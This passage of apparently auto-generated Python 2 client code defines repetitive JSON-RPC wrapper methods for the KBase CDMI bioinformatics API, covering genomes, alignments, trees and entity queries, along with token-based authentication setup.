request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def external_ids_to_fids(self, external_ids, prefix_match):
arg_hash = {'method': 'CDMI_API.external_ids_to_fids',
'params': [external_ids, prefix_match],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def reaction_strings(self, reactions, name_parameter):
arg_hash = {'method': 'CDMI_API.reaction_strings',
'params': [reactions, name_parameter],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_complexes(self, roles):
arg_hash = {'method': 'CDMI_API.roles_to_complexes',
'params': [roles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def complexes_to_roles(self, complexes):
arg_hash = {'method': 'CDMI_API.complexes_to_roles',
'params': [complexes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_subsystem_data(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_subsystem_data',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def representative(self, genomes):
arg_hash = {'method': 'CDMI_API.representative',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def otu_members(self, genomes):
arg_hash = {'method': 'CDMI_API.otu_members',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def otus_to_representatives(self, otus):
arg_hash = {'method': 'CDMI_API.otus_to_representatives',
'params': [otus],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_genomes(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_genomes',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def text_search(self, input, start, count, entities):
arg_hash = {'method': 'CDMI_API.text_search',
'params': [input, start, count, entities],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def corresponds(self, fids, genome):
arg_hash = {'method': 'CDMI_API.corresponds',
'params': [fids, genome],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def corresponds_from_sequences(self, g1_sequences, g1_locations, g2_sequences, g2_locations):
arg_hash = {'method': 'CDMI_API.corresponds_from_sequences',
'params': [g1_sequences, g1_locations, g2_sequences, g2_locations],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def close_genomes(self, seq_set, n):
arg_hash = {'method': 'CDMI_API.close_genomes',
'params': [seq_set, n],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def representative_sequences(self, seq_set, rep_seq_parms):
arg_hash = {'method': 'CDMI_API.representative_sequences',
'params': [seq_set, rep_seq_parms],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result']
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def align_sequences(self, seq_set, align_seq_parms):
arg_hash = {'method': 'CDMI_API.align_sequences',
'params': [seq_set, align_seq_parms],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def build_tree(self, alignment, build_tree_parms):
arg_hash = {'method': 'CDMI_API.build_tree',
'params': [alignment, build_tree_parms],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def alignment_by_id(self, aln_id):
arg_hash = {'method': 'CDMI_API.alignment_by_id',
'params': [aln_id],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def tree_by_id(self, tree_id):
arg_hash = {'method': 'CDMI_API.tree_by_id',
'params': [tree_id],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities(self):
arg_hash = {'method': 'CDMI_API.all_entities',
'params': [],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_relationships(self):
arg_hash = {'method': 'CDMI_API.all_relationships',
'params': [],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity(self, entity_names):
arg_hash = {'method': 'CDMI_API.get_entity',
'params': [entity_names],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship(self, relationship_names):
arg_hash = {'method': 'CDMI_API.get_relationship',
'params': [relationship_names],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
class CDMI_EntityAPI(object):
def __init__(self, url=None, timeout=30 * 60, user_id=None,
password=None, token=None, ignore_authrc=False):
if url is None:
url = 'http://kbase.us/services/cdmi_api'
scheme, _, _, _, _, _ = urlparse.urlparse(url)
if scheme not in _URL_SCHEME:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
# token overrides user_id and password
if token is not None:
self._headers['AUTHORIZATION'] = token
elif user_id is not None and password is not None:
self._headers['AUTHORIZATION'] = _get_token(user_id, password)
elif 'KB_AUTH_TOKEN' in os.environ:
self._headers['AUTHORIZATION'] = os.environ.get('KB_AUTH_TOKEN')
elif not ignore_authrc:
authdata = _read_inifile()
if authdata is None:
authdata = _read_rcfile()
if authdata is not None:
if authdata.get('token') is not None:
self._headers['AUTHORIZATION'] = authdata['token']
elif(authdata.get('user_id') is not None
and authdata.get('password') is not None):
self._headers['AUTHORIZATION'] = _get_token(
authdata['user_id'], authdata['password'])
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def get_all(self, object_names, filter_clause, parameters, fields, count):
arg_hash = {'method': 'CDMI_EntityAPI.get_all',
'params': [object_names, filter_clause, parameters, fields, count],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Alignment(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Alignment',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Alignment(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Alignment',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Alignment(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Alignment',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AlignmentAttribute(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AlignmentAttribute',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AlignmentAttribute(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AlignmentAttribute',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AlignmentAttribute(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AlignmentAttribute',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AlignmentRow(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AlignmentRow',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AlignmentRow(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AlignmentRow',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AlignmentRow(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AlignmentRow',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_AlleleFrequency(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_AlleleFrequency',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_AlleleFrequency(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_AlleleFrequency',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_AlleleFrequency(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_AlleleFrequency',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
